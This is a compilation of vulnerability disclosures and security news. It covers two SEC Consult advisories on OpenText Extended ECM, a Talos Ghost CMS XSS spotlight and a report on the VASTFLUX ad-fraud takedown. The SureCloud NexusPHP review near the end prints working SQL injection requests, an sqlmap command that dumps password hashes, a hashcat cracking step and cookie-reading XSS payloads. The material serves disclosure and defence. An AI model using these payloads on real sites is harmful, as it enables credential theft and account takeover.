Multiple vulnerabilities have been discovered across Common Desktop Environment version 1.6, Motif version 2.1, and X.Org libXpm versions prior to 3.5.15 on Oracle Solaris 10 that can be chained together to achieve root.

Solaris 10 dtprintinfo / libXm / libXpm Security Issues

OpenText Extended ECM versions 16.2.2 through 22.3 suffer from arbitrary file deletion, information disclosure, local file inclusion, and privilege escalation vulnerabilities.

OpenText Extended ECM 22.3 File Deletion / LFI / Privilege Escsalation

OpenText Extended ECM versions 20.4 through 22.3 suffer from a pre-authentication remote code execution vulnerability in the Java frontend.

SEC Consult Vulnerability Lab Security Advisory < 20230117-1 >=======================================================================               title: Pre-authenticated Remote Code Execution via Java frontend                      and QDS endpoint             product: OpenText™ Content Server component of OpenText™ Extended ECM  vulnerable version: 20.4 - 22.3       fixed version: 22.4          CVE number: CVE-2022-45927              impact: Critical            homepage: https://www.opentext.com               found: 2022-09-16                  by: Armin Stock (Atos)                      SEC Consult Vulnerability Lab                      An integrated part of SEC Consult, an Atos company                      Europe | Asia | North America                      https://www.sec-consult.com=======================================================================Vendor description:-------------------"OpenText™ Extended ECM is an enterprise CMS platform that securely governs theinformation lifecycle by integrating with leading enterprise applications, suchas SAP®, Microsoft® 365, Salesforce and SAP SuccessFactors®. Bringing contentand processes together, Extended ECM provides access to information when andwhere it’s needed, improves decision-making and drives operational effectiveness."Source: https://www.opentext.com/products/extended-ecmBusiness recommendation:------------------------The vendor provides a patch which should be installed immediately.Vulnerability overview/description:-----------------------------------1) Pre-authenticated Remote Code Execution via Java frontend and QDS endpoint (CVE-2022-45927)The `QDS` endpoints of the `Content Server` are not protected by the normaluser management functionality of the `Content Server`, but check the value ofthe key `_REQUEST` of the incoming data. Normally this parameter is set by theHTTP frontend (e.g. the `CGI` binary `cs.exe` or `Java` application servlet) to`llweb`.There is a bug in the `Java` application server, found in`%OT_BASE%/application/cs.war`, which allows an attacker to actually set thevalue of the key `_REQUEST` to an arbitrary value and bypass the authorizationchecks.Most of the endpoints cannot be called, because they require specific data typesof the incoming data, which can not be controlled by the attacker. Only stringsare supported. But a few endpoints can be called which allow an attacker to createfiles or execute arbitrary code on the server.Proof of concept:-----------------1) Pre-authenticated Remote Code Execution via Java frontend and QDS endpoint (CVE-2022-45927)To be able to set the value of the `_REQUEST` parameter the attacker has tosend the data via a `POST` request with a `Content-Type` of `multipart/form-data`.This results in the following execution flow:-------------------------------------------------------------------------------[ Details removed, will be published at a later date ]-------------------------------------------------------------------------------The following request (using the `CGI` frontend) results in an unauthorizedresponse:-------------------------------------------------------------------------------[ PoC removed, will be published at a later date ]--------------------------------------------------------------------------------------------------------------------------------------------------------------<div class="cs-form-container cs-form-message-container">   <div>     <div class="cs-form-line-text cs-form-message cs-form-message-error" title="Error" id="errMsg" >       <p>         Content Server Error:       </p>       <p>         The request did not come from XXX.       </p>     </div>   </div></div>-------------------------------------------------------------------------------Whereas using the `Java` application server results in the following response:-------------------------------------------------------------------------------HTTP/1.1 200A<1,?,'ErrMsg'=?,'ErrMsgDetail'=?,'OK'=true,'QDSServerList'={}>Content-Type: text/html;charset=UTF-8Cache-Control: no-cacheX-Frame-Options: SAMEORIGINContent-Security-Policy: frame-ancestors 'self'X-UA-Compatible: IE=edgeContent-Length: 0Date: Tue, 27 Sep 2022 13:04:47 GMTConnection: close-------------------------------------------------------------------------------Create new objects:Using this bug it is possible to create objects in the `Content Server` withoutknown credentials and in the context of the super-admin user ( ID `1000` ), bycalling the endpoint `[ Details removed, will be published at a later date ]`.-------------------------------------------------------------------------------[ PoC removed, will be published at a later date ]-------------------------------------------------------------------------------The new object (subType = `145` text file) is created without providing cookiesand the `owner` attribute of this object is set to `1000` (super admin):-------------------------------------------------------------------------------HTTP/1.1 200A<1,?,'CATEGORY'=?,'CloneTime'=D/2022/9/28: 8:10:5,'COMMENT'='created','ContentType'=?,'CREATEDATE'=D/2022/9/28:8:10:5,'CREATEDBY'=1000,'DataID'=51982,'DATELASTMODIFY'=D/2022/9/28:8:10:5,'EXATT1'=?,'EXATT2'=?,'EXTENDEDDATA'=?,'GROUPPERM'=128,'location'=E648871951,'MAJOR'=?,'MAXVERSION'=-1,'MINOR'=?,'Name'='qds-create-poc.txt','nextURL'=E648871951,'Node'=A<1,?,'AssignedTo'=?,'CacheExpiration'=0,'Catalog'=0,'ChildCount'=0,'CreateDate'=D/2022/9/28:8:10:5,'CreatedBy'=1000,'DataID'=51982,'DataType'=?,'DateAssigned'=?,'DateCompleted'=?,'DateDue'=?,'DateEffective'=?,'DateExpiration'=?,'DateStarted'=?,'DCategory'=?,'DComment'='created','Deleted'=0,'ExAtt1'=?,'ExAtt2'=?,'ExtendedData'=?,'ExternalCreateDate'=?,'ExternalCreatorID'=?,'ExternalModifyDate'=?,'ExternalSourceID'=?,'GIF'=?,'GPermissions'=128,'GroupID'=999,'GUID'='@[537A1229-E0F5-45EE-A3F2-D7F91EE6CBBC]','Major'=?,'MaxVers'=-1,'Minor'=?,'ModifiedBy'=1000,'ModifyDate'=D/2022/9/28:8:10:5,'Multilingual'=V{<'LanguageCode','Name','DComment'><'de','qds-create-poc.txt','created'>},'Name'='qds-create-poc.txt','Ordering'=?,'OriginDataID'=0,'OriginOwnerID'=0,'OwnerID'=-2004,'ParentID'=2004,'PermID'=?,'Priority'=?,'ReleaseRef'=?,'Reserved'=0,'ReservedBy'=0,'ReservedDate'=?,'SPermissions'=16777215,'Status'=?,'SubType'=144,'UPermissions'=16777215,'UserID'=1000,'VersionNum'=1,'WPermissions'=128>,'OK'=true,'ORDERING'=?,'ORIGINALID'=0,'ORIGINALVOLID'=0,'PARENTID'=2004,'PERMISSIONS'=-2130706433,'PermsOK'=true,'Public'=false,'RELEASEREF'=?,'RESERVED'=0,'RESERVEDBY'=0,'RESERVEDDATE'=?,'SUBTYPE'=144,'SYSTEMPERM'=16777215,'USERID'=1000,'USERPERM'=16777215,'VERSION'=A<1,?,'DataSize'=6,'DocID'=51982,'ExternalCreateDate'=?,'ExternalCreatorID'=?,'ExternalModifyDate'=?,'ExternalSourceID'=?,'FileCDate'=D/2022/9/28:8:10:5,'FileCreator'=?,'FileMDate'=D/2022/9/28:8:10:5,'FileName'='qds-create-poc.txt','FileType'='html','GUID'='@[DF09D9F7-6A86-40CB-AECD-57FD5FB7D38B]','Indexed'=0,'Locked'=0,'LockedBy'=?,'LockedDate'=?,'MimeType'='text/html','Owner'=1000,'PageNum'=?,'Platform'=0,'ProviderId'=51982,'ProviderName'='SQL','ResSize'=0,'VerCDate'=D/2022/9/28:8:10:5,'VerComment'=?,'VerMajor'=0,'VerMDate'=D/2022/9/28:8:10:5,'VerMinor'=1,'Version'=1,'VersionID'=51982,'VersionName'='1','VerType'=?>,'versionInfo'=A<1,?,'COMMENT'=?,'CREATEDATE'=D/2022/9/28:8:10:5,'FILECREATEDATE'=D/2022/9/28:8:10:5,'FILECREATOR'=?,'FILEDATASIZE'=6,'FILEMODIFYDATE'=D/2022/9/28:8:10:5,'FILENAME'='qds-create-poc.txt','FILEPLATFORM'=0,'FILERESSIZE'=0,'FILETYPE'='html','ID'=51982,'INDEXED'=0,'LOCKED'=0,'LOCKEDBY'=?,'LOCKEDDATE'=?,'MIMETYPE'='text/html','MODIFYDATE'=D/2022/9/28:8:10:5,'NAME'='1','NODEID'=51982,'NUMBER'=1,'OWNER'=1000,'PROVIDERID'=51982,'PROVIDERNAME'='SQL','TYPE'=?>,'VOLUMEID'=-2004,'WORLDPERM'=128>Content-Type: text/html;charset=UTF-8Cache-Control: no-cacheX-Frame-Options: SAMEORIGINContent-Security-Policy: frame-ancestors 'self'X-UA-Compatible: IE=edgeContent-Length: 0Date: Wed, 28 Sep 2022 08:10:05 GMTConnection: close-------------------------------------------------------------------------------There is a process object (`typeId` = 271), which can be created and executedafterwards allowing attackers to execute arbitrary code.Vulnerable / tested versions:-----------------------------The following version has been tested:* 22.1 (16.2.19.1803)The following versions are vulnerable according to the vendor:* 20.4 - 22.3Vendor contact timeline:------------------------2022-10-07: Vendor contacted via security@opentext.com2022-10-07: Vendor acknowledged the email and is reviewing the reports2022-11-18: Vendor confirms all vulnerabilities and is working on a patch aimed to             be released in November2022-11-24: Vendor delays the patch "few days/weeks into December"2022-11-25: Requesting CVE numbers (Mitre)2022-12-15: Vendor delays the patch and provides a release date: January 16th 20232023-01-17: Public release of security advisorySolution:---------Upgrade to at least version 22.4 or apply hotfixes which can be downloaded atthe vendor's page:https://support.opentext.com/csm?id=kb_article_view&sysparm_article=KB0781429Workaround:-----------NoneAdvisory URL:-------------https://sec-consult.com/vulnerability-lab/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~SEC Consult Vulnerability LabSEC Consult, an Atos companyEurope | Asia | North AmericaAbout SEC Consult Vulnerability LabThe SEC Consult Vulnerability Lab is an integrated part of SEC Consult, anAtos company. It ensures the continued knowledge gain of SEC Consult in thefield of network and application security to stay ahead of the attacker. TheSEC Consult Vulnerability Lab supports high-quality penetration testing andthe evaluation of new offensive and defensive technologies for our customers.Hence our customers obtain the most current information about vulnerabilitiesand valid recommendation about the risk profile of new technologies.~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Interested to work with the experts of SEC Consult?Send us your application https://sec-consult.com/career/Interested in improving your cyber security with the experts of SEC Consult?Contact our local offices https://sec-consult.com/contact/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Mail: security-research at sec-consult dot comWeb: https://www.sec-consult.comBlog: http://blog.sec-consult.comTwitter: https://twitter.com/sec_consultEOF Armin Stock / @2023

OpenText Extended ECM 22.3 Java Frontend Remote Code Execution

OpenText Extended ECM versions 20.4 through 22.3 suffer from a pre-authentication remote code execution vulnerability in cs.exe.

SEC Consult Vulnerability Lab Security Advisory < 20230117-0 >  
=======================================================================  
               title: Pre-authenticated Remote Code Execution in cs.exe  
             product: OpenText™ Content Server component of OpenText™ Extended ECM  
  vulnerable version: 20.4 - 22.3  
       fixed version: 22.4  
          CVE number: CVE-2022-45923  
              impact: Critical  
            homepage: https://www.opentext.com/  
               found: 2022-09-16  
                  by: Armin Stock (Atos)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Atos company  
                      Europe | Asia | North America

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"OpenText™ Extended ECM is an enterprise CMS platform that securely governs the  
information lifecycle by integrating with leading enterprise applications, such  
as SAP®, Microsoft® 365, Salesforce and SAP SuccessFactors®. Bringing content  
and processes together, Extended ECM provides access to information when and  
where it’s needed, improves decision-making and drives operational effectiveness."

Source: https://www.opentext.com/products/extended-ecm

Business recommendation:  
------------------------  
The vendor provides a patch which should be installed immediately.

Vulnerability overview/description:  
-----------------------------------  
1) Pre-authenticated Remote Code Execution in cs.exe (CVE-2022-45923)  
The `Common Gateway Interface (CGI)` program `cs.exe` of the `Content Server`  
has a vulnerability, which allows an attacker to increase/decrease an arbitrary  
memory address by 1 and to trigger a call to a method of a `vftable` with a  
`vftable pointer` value chosen by the attacker.

The `cs.exe` does de-serialize (crack) the user provided data in the `_fInArgs`  
parameter, if the parameter `_ApiName` is set. During this de-serialization to  
a `class KOSValue` object, the function `obj_ref_cracker` can be called. This  
function tries to create a new `class KOSValue` object with an unknown class ID  
of `3`.

As the class ID is unknown the function returns an object of type  
`KOSValueBaseClass` instead of `KOSObjRefClass`, but the value of the  
`class_ptr` attribute of the new `class KOSValue` object is controlled by the  
attacker. This new object can then be used to increase/decrease arbitrary  
memory addresses and call methods of its `vftable` via the functions  
`KOSValueBaseClass::AddReference` and `KOSValueBaseClass::ReleaseReference`.

Proof of concept:  
-----------------  
1) Pre-authenticated Remote Code Execution in cs.exe (CVE-2022-45923)  
The following request crashes the `CGI` binary `cs.exe` with an `access  
violation exception - 0xC0000005` trying to read memory from address  
`0xAAAA+8`:

-------------------------------------------------------------------------------  
[ PoC removed, will be published at a later date ]  
-------------------------------------------------------------------------------

There are `.dll` files (`libaprutil-1` & `libapriconv-1.dll`) which are not  
compiled with the security flag `Address Space Layout Randomization - ASLR`  
enabled, which can be used to achieve remote code execution.

-------------------------------------------------------------------------------  
.\winchecksec.exe --json (get-item C:\OPENTEXT-22\cgi\*.dll) > .\checksec-results.json  
-------------------------------------------------------------------------------

-------------------------------------------------------------------------------  
cat checksec-results.json | jq -r '.[] | [.path, .mitigations.aslr.presence] | @csv'

"icudt69.dll","Present"  
"icuin69.dll","Present"  
"icuio69.dll","Present"  
"icutu69.dll","Present"  
"icuuc69.dll","Present"  
"jsoncpp.dll","Present"  
"libapr-1.dll","Present"  
"libapriconv-1.dll","NotPresent"  
"libaprutil-1.dll","NotPresent"  
"libcrypto-1_1-x64.dll","Present"  
"libexpat.dll","Present"  
"libssl-1_1-x64.dll","Present"  
"llcrypt.dll","Present"  
"llisapi.dll","Present"  
"llkernel.dll","Present"  
"llresources.dll","Present"  
"log4cxx.dll","Present"  
"PocoFoundation.dll","Present"  
-------------------------------------------------------------------------------

Vulnerable / tested versions:  
-----------------------------  
The following version has been tested:  
* 22.1 (16.2.19.1803)

The following versions are vulnerable according to the vendor:  
* 20.4 - 22.3

Vendor contact timeline:  
------------------------  
2022-10-07: Vendor contacted via security@opentext.com  
2022-10-07: Vendor acknowledged the email and is reviewing the reports  
2022-11-18: Vendor confirms all vulnerabilities and is working on a patch aimed to  
             be released in November  
2022-11-24: Vendor delays the patch "few days/weeks into December"  
2022-11-25: Requesting CVE numbers (Mitre)  
2022-12-15: Vendor delays the patch and provides a release date: January 16th 2023  
2023-01-17: Public release of security advisory

Solution:  
---------  
Upgrade to at least version 22.4 or apply hotfixes which can be downloaded at  
the vendor's page:  
https://support.opentext.com/csm?id=kb_article_view&sysparm_article=KB0781429

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult, an Atos company  
Europe | Asia | North America

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Atos company. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF Armin Stock / @2023

OpenText Extended ECM 22.3 cs.exe Remote Code Execution

Mainly Apple iOS in-app ads were targeted, injecting malicious JavaScript code to rack up phony views.

A sprawling new adware campaign that abused the Vast video ad server template to rack up fraudulent digital advertising views on an enormous scale has been shut down.

At its peak, the adware effort hit more than 12 billion requests per day.

Human Security's Satori threat intelligence team uncovered the adware campaign, touting it as the largest find in the cybersecurity research group's history. Following the discovery, Satori said it led a takedown of the ad fraud operation, which they dubbed as Vastflux.

The team added in its report that, in all, Vastflux spoofed more than 1,700 apps, targeted 1,200 publishers, and displayed ads on applications running on about 11 million devices.

"What was technically impressive and incredibly concerning about Vastflux \[were\] the fraudsters hijacked impressions on legitimate apps, which makes it nearly impossible for users to tell if they are impacted," Gavin Reid, Human's CISO, said.

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Massive Adware Campaign Shuttered

By Waqas
The ad fraud was discovered while the researchers were investigating an iOS application that had been heavily impacted by an app spoofing attack.
This is a post from HackRead.com Read the original post: Massive Ad Fraud Scheme Shut Down: 11 Million Phones Targeted

Dubbed VASTFLUX, the ad fraud had 1,700 apps spoofed, targeting 120 publishers on 11 million devices with 12 billion ad requests per day.

The cybersecurity researchers at HUMAN Security Inc. have announced the takedown of a sophisticated, organized, and large-scale ad fraud operation dubbed VASTFLUX.

HUMAN Security is among the world’s leading firms offering advanced defences against digital attacks. Previously, the company reported large-scale scams involving iOS and Android devices, such as **Scylla**, **PARETO**, **Methbot,** and **3ve**.

VASTFLUX is a combination of two terms that reflect its functionality. VAST represents the Digital Video Ad Serving Template exploited in this operation. The name Flux is inspired by the Fast Flux concept, which is an evasion tactic used by cybercriminals.

Team Satori from HUMAN discovered the operation when investigating an iOS application, which was heavily impacted by an **app spoofing attack**.

The researchers found it a highly sophisticated scheme in which cybercriminals exploited the limited signal available to the verification partners in their targeted environment, including in-app advertising mainly on iOS.

The ad fraud later evolved into spoofing bids on a particular platform to make them appear on another platform. This made cross-platform attacks impossible to deter. HUMAN worked with its partners in the HUMAN Collective to obtain further information into the fraud’s traffic volumes and verification tags used on their ads.

The team deployed three mitigation methods within two weeks to protect users from VASTFLUX before taking it down.

**Targeted Entities**

According to a **blog post** shared by HUMAN with Hackread.com, the fraudulent operation accounted for over 12 billion fake ad requests per day and affected around 11 million devices by running ads within apps. For this purpose, the perpetrators spoofed 1,700 apps targeting around 10 publishers.

This is HUMAN’s Satori Threat Intelligence and Research Team’s highest per day volume of an operation uncovered by this team. It even eclipsed Human’s previously discovered peak volumes in high-profile disruptions. This includes PARETO, Methbot, and 3ve.

**How Did the Attack Work?**

The attackers injected malicious **JavaScript code into digital ads**, which let fraudsters stack dozens of video ads upon each other and register views for ads that the user couldn’t see. HUMAN shut down this operation via a private takedown effort and protected the programming advertising ecosystem. However, the company is still monitoring its operations.

Malicious JS code (Credit: Satori Threat Intelligence and Research Team)

The company’s CISO, Gavin Reid, stated that VASTFLUX was a “technically impressive and incredibly concerning” operation because the fraudsters hijacked impressions of authentic apps, making it difficult for users to feel suspicious.

“Orchestrating a private takedown of this magnitude and severity is no small feat, and I want to take a moment to thank all involved, including the HUMAN Satori Threat Intelligence and Research Team, the team at clean.io and the industry leaders who make up The HUMAN Collective who are dedicated to making the programmatic ecosystem safe and HUMAN,” Reid said.

1.  Shazam flaw exposed location of Android, iOS users
2.  SolarWinds hackers exploited 0-day to hack iPhones
3.  European Spyware Vendor selling iOS Device Exploits
4.  Malicious SDK spying, defrauding users with iOS apps
5.  Facebook removes accounts for spreading iOS malware

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Massive Ad Fraud Scheme Shut Down: 11 Million Phones Targeted

Dave McDaniel of Cisco Talos discovered this vulnerability.
Cisco Talos recently discovered a cross-site scripting (XSS) vulnerability in Ghost CMS.
Ghost is a content management system with tools to build a website, publish content and send newsletters. Ghost offers paid subscriptions to members and supports a number of integrations with

Thursday, January 19, 2023 15:01

_Dave McDaniel of Cisco Talos discovered this vulnerability._

Cisco Talos recently discovered a cross-site scripting (XSS) vulnerability in Ghost CMS.

Ghost is a content management system with tools to build a website, publish content and send newsletters. Ghost offers paid subscriptions to members and supports a number of integrations with external services.

The TALOS-2022-1686 (CVE-2022-47194-CVE-2022-47197) shows that several XSS vulnerabilities could lead to privilege escalation.

Ghost CMS separates users into four groups (five, if including the site owner) of increasing privilege: Contributor, Author, Editor and Administrator. Contributor users have the least privilege and are allowed to create but not publish posts. All users have the ability to include social media links, as well as a few other pieces of information that will be included on their posts and author pages. A stored XSS vulnerability exists in a number of these fields, and it can be leveraged from basic user attacks to full privilege escalation. As with any XSS, it does require a target user with the correct access level to access affected resources while logged in to trigger the injected Javascript. The vulnerabilities listed here can be triggered when a higher-level user simply previews or visits any post by the malicious user, as these social links seem to be included in all of a user's posts. We have confirmed that a full privilege escalation to administrator can be achieved with the correct Javascript payload.

Separating the admin domain as documented at https://ghost.org/docs/config/#admin-url will prevent this type of vulnerability from being exploited to perform privileged API calls, such as modifying a user group, adding users, etc. However, in default installations, these vulnerabilities can be used for privilege escalation via XSS. Essentially this means that, in default installations of Ghost CMS, users that can author pages and administrator users have the same privileges.

Ghost responded to notification of this advisory with: “Ghost is designed to be used by trusted users, and we are not interested in hypothetical attack vectors involving staff users attacking each other. This is not how the product is used. For any people who are using Ghost in an untrusted environment, we have clearly documented steps to add further separation of concerns between staff users... We do not consider this to be a valid report."

Cisco Talos believes these are potential security issues due to the fact that it is trivial to escalate privileges in default installations. Talos notified Ghost in adherence to Cisco’s vulnerability disclosure policy.

Talos tested and confirmed this version of Ghost could be exploited by this vulnerability: Ghost Foundation Ghost 5.9.4.

The following Snort rules will detect exploitation attempts against this vulnerability: 60764-60765. Additional rules may be released in the future and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Vulnerability Spotlight: XSS vulnerability in Ghost CMS

Weak access control in NexusPHP before 1.7.33 allows a remote authenticated user to edit any post in the forum (this is caused by a lack of checks performed by the /forums.php?action=post page).

SureCloud undertook an independent security review of NexusPHP and identified multiple vulnerabilities from both authenticated and unauthenticated sources that could be exploited remotely. 

Identifying vulnerabilities is part of how SureCloud provides its clients with superior risk management and security services and tools — explore the possibilities of SureCloud’s Vulnerability Management software.

In our NexusPHP security review, we assigned the following CVEs:

*   **_CVE2022-46887 –_** Unauthenticated SQL Injection
*   _**CVE2022-46889 –**_ Authenticated Stored Cross-Site Scripting
*   _**CVE2022-46888 –**_ Unauthenticated Reflected Cross-Site Scripting
*   _**CVE2022-46890 –**_ Weak Access Control

These CVEs impact all versions of NexusPHP before and including 1.7.32. The latest version, 1.7.33, includes security fixes for all of the above vulnerabilities.

Below is a detailed overview of the NexusPHP platform, the vulnerabilities SureCloud identified, and suggestions on how to fix them. 

****What is NexusPHP?****

NexusPHP (_github.com/xiaomlove/nexusphp_ _–_ _nexusphp.org_) is an open-source private torrent (PT) content management system (CMS).

Compared to a public torrent tracker, a private one only allows users that are logged in to browse, download and upload torrents from its URL. This project was forked from an outdated and unmaintained version of NexusPHP (_github.com/zjutjh/NexusPHP_) and enriched with Laravel and Filament. 

****What is an SQL Injection?****

Structured Query Language (SQL) Injection is a vulnerability that occurs when an attacker directly embeds code into an SQL query. This results in a change to the meaning of the original query and the unexpected modification or extraction of potentially sensitive data.

It is one of the most harmful types of attack, as it can be used against any website or web application that uses an SQL-based database. In some extreme situations, it would also be possible to compromise the underlying Database Management System (DBMS) and gain access to an organization’s entire infrastructure.

There are two main ways to exploit SQL injections:

*   _**Results in output –**_ Occurs when the output from the manipulated query is reflected in the application’s response via an error message or in the page content, making it very easy to identify this type of vulnerability

*   _**Blind –**_ Occurs when no output data or error message is returned in the application’s responses. The extraction of sensitive data can still happen via the use of time-based functions embedded in the DBMS

****CVE2022-46887 – Unauthenticated SQL Injection****

Unauthenticated remote attackers can exploit an instance of SQL injection (time-based function) affecting the ‘conuser\[\]’ parameter in ‘takeconfirm.php’. 

A proof of concept request will make the DBMS go into a state of sleep for two seconds before serving the following response: 

_**POST /takeconfirm.php HTTP/1.1  
Host: 127.0.0.1  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 50  
id=1&email=fail\_sendmail&conusr\[\]=1-sleep(2));+–+**_

This behavior is caused by the way the ‘consur’ parameter is handled in line nine of the file, /public/takeconfirm.php:

_**if(isset($\_POST\[‘conusr’\]))  
sql\_query(“UPDATE users SET status = ‘confirmed’, editsecret = ” WHERE id IN (” . implode(“, “, $\_POST\[‘conusr’\]) . “) AND status=’pending’”);**_

As this is a time-based SQL injection, it can be exploited by automated tools such as ‘sqlmap’. For example:

_**sqlmap -r post\_request.txt -D nexusphp -T users -C secret,passhash –dump**_

> 

With secret (salt) and passhash obtained, the original plaintext password can be retrieved using hashcat with the following parameter:

_**File format: <passhash>:<secret>  
Run: hashcat.exe -m 3800**_

Several other authenticated SQL injections were observed during the code review, but a CVE was not requested due to the authentication needed to fully exploit them. For example:

_**Page:** cheaterbox.php**Parameter:** delcheater**Privileges:** Staff Member**Proof of concept:**_ 

                      _**POST/cheaterbox.php                                                                                                                                                                                            \[…\]**_                                                                                                                           

                      _**setdealt=Set+Dealt&delcheater\[\]=0)+UNION+ALL+SELECT+(‘anything’**_                                                    

Caused by the following code in public/cheaterbox.php:

_**15:     $res = sql\_query (“SELECT id FROM cheaters WHERE dealtwith=0 AND id IN (” . implode(“, “, $\_POST\[‘delcheater’\]) . “)”);  
24:     $res = sql\_query (“SELECT id FROM cheaters WHERE id IN (” . implode(“, “, $\_POST\[‘delcheater’\]) . “)”);**_

_**Page:** nowarn.php**Parameter:** usernw**Privilege:** Staff Member**Proof of concept:**_ 

                    _**POST /nowarn.php HTTP/1.1**_                                                    

                    _**\[…\]**_                                                                                                                                                                                                                                     _**nowarned=nowarned&usernw\[\]=2)+UNION+SELECT+passhash+FROM+users+WHERE+ID=(1&**_

                   _**desact=1&delete=o**_                                                  

Caused by the following code in public/nowarn.php:

_**27: $r = sql\_query(“SELECT modcomment FROM users WHERE id IN (” . implode(“, “, $\_POST\[‘usernw’\]) . “)”)or sqlerr(\_\_FILE\_\_, \_\_LINE\_\_);**_

****How do you prevent SQL Injections?****

It’s possible to prevent SQL injections at the code base by filtering user input. This is done by implementing prepared statements or stored procedures that are available in all programming languages. This prevents user input interfering with the query structure and the original meaning remains unchanged. 

Other best practices should also be in place to limit the impact of potential SQL Injection vulnerabilities. For example:

*   The principle of least privilege when connecting to a DBMS

*   A Web Application Firewall (WAF), which prevents common payloads from exploiting the vulnerability

*   Software Development Lifecycle (SDLC) methodology can help identify vulnerabilities before they are pushed into a production environment through the use of code analysis tools

****What is Cross-Site Scripting (XSS)?****

Cross-site scripting attacks occur when user input is reflected into the application’s page without being properly sanitized. This allows for the possible injection of JavaScript or HTML code that can be executed once the page is rendered in a browser.

There are three types of XSS:

*   _**Stored –**_ This occurs when the user input is stored within a database and is returned unsanitized in later responses. E.g. every time a visitor opens a specific page in the vulnerable application

*   _**Reflected –**_ This happens when the user input (often in GET or POST parameter) is reflected back unsanitized, but only in the current response. Therefore, the XSS payload must be embedded in the request to be successful

*   _**DOM-based –**_ Commonly occurs when the user input changes the browser’s DOM environment in a way that JavaScript code is injected and executed. This often happens because client-side JavaScript cannot process data from untrusted input sources, such as old libraries

****CVE2022-46880 – Authenticated Stored Cross-Site Scripting** **

An authenticated attacker with permissions to upload new subtitles can exploit an instance of cross-site scripting (stored) affecting the ‘title’ parameter used in ‘subtitles.php’ page. 

A proof of concept request is as follows: 

_**POST /subtitles.php? HTTP/1.1  
Host: 192.168.204.137**_

_**Content-Type: multipart/form-data;                                                                                                                                        boundary=—————————538246582365809108635404342  
Content-Length: 706  
Cookie: <valid session token>**_

_**—————————–538246582365809108635404342**_  
_**Content-Disposition: form-data; name=”action”**_

_**Upload**_  
_**—————————–538246582365809108635404342**_  
_**Content-Disposition: form-data; name=”file”; filename=”test.srt”**_  
_**Content-Type: text/html**_

 _**Test  
—————————–538246582365809108635404342  
Content-Disposition: form-data; name=”torrent\_id”**_ 

_**1  
—————————–538246582365809108635404342  
Content-Disposition: form-data; name=”title”**_

_**111<svg/onload=alert(document.cookie);>  
—————————–538246582365809108635404342  
Content-Disposition: form-data; name=”sel\_lang”**_

_**14**_  
_**—————————–538246582365809108635404342–**_

This is caused by how the ‘details.php’ page reflects the user input (title) without proper encoding:

_**while($a = mysql\_fetch\_assoc($r))  
\[..\]  
<u>”. $a\[“title”\]. “</u>  
\[…\]**_

****CVE2022-46888 – Unauthenticated Reflected Cross-Site Scripting** **

An unauthenticated attacker can exploit an instance of cross-site scripting (reflected) affecting the ‘secret’ parameter used on the ‘login.php’ page.

The proof of concept request is as follows:

_**/login.php?secret=”><svg+onload=”alert(document.cookie)**_

The input passed in ‘secret’ is reflected twice in the response page without proper encoding, which allows JavaScript code to be executed in the browser. The issue is caused by the following line in the code of public/login.php: 

_**53: <input type=”hidden” name=”secret” value=”<?php echo $\_GET\[‘secret’\] ?? ”?>”>**_

Several other instances of cross-site scripting, authenticated or unauthenticated, were observed during the code review, but no CVEs were raised. For example: 

_**Page:** user-ban-log.php**Parameter:** q**Privilege:** unauthenticated**Proof of concept:** /user-ban-log.php?q=admin”><svg/onload=alert(document.cookie)>_

_**Page:** log.php**Parameter:** query**Privilege:** user role**Proof of concept:** /log.php?query=”><svg+onload=”alert(document.cookie)&search=all&action=dailylog_

_**Page:** moresmiles.php**Parameter:** text**Privilege:** user role**Proof of concept:** /moresmilies.php?form=&text=’)”><svg+onload=alert(document.cookie)>_

_**Page:** myhr.php**Parameter:** q**Privilege:** user role**Proof of concept:** /myhr.php?q=”><svg+onload=alert(document.cookie)>_

_**Page:** viewrequests.php**Parameter:** id**  
Privilege:** user role**Proof of concept:** /viewrequests.php?action=newmessage&id=><svg+onload=alert(document.cookie) and /viewrequests.php?action=res&id=”><svg+onload=”alert(document.cookie)_

****What’s the solution to XSS?****

The best way to defend against cross-site scripting is output encoding. All user input reflected in a later response, received from a database or from a GET/POST parameter, should be encoded to prevent it from being executed in a browser. Several types of encoding can be applied based on where the user output is returned, such as URL and HTML JavaScript or CSS encoding. 

You can implement other security measures to limit the severity of an XSS attack, such as the use of ‘Content Type’ and ‘X-Content-Type-Options’ response headers. Both will ensure browsers interpret responses in the intended way, for example, text/plain instead of text/html. 

